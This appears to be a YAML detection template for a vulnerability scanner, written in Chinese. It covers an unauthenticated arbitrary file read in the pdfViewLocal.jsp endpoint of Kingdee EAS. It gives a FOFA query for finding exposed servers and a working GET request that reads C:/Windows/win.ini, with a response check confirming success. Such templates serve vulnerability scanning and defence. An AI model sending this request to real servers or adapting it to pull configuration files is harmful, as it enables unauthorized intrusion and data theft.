product: 金蝶EAS
vName: 金蝶EAS pdfviewlocal任意文件读取
type: 文件读取
vID: [ ]
level: 3
vDesc: 金蝶EAS pdfviewlocal接口处存在任意文件读取漏洞，未经身份验证的攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。
version: ''
note: ''
search:
  FOFA: app="Kingdee-EAS"
protocol: http
link: https://blog.csdn.net/luochen2436/article/details/135479478
fix:
  - 联系软件厂商更新至最新安全版本。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /plt_document/fragments/content/pdfViewLocal.jsp?path=C:/Windows/win.ini
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - for 16-bit app support
            logic: and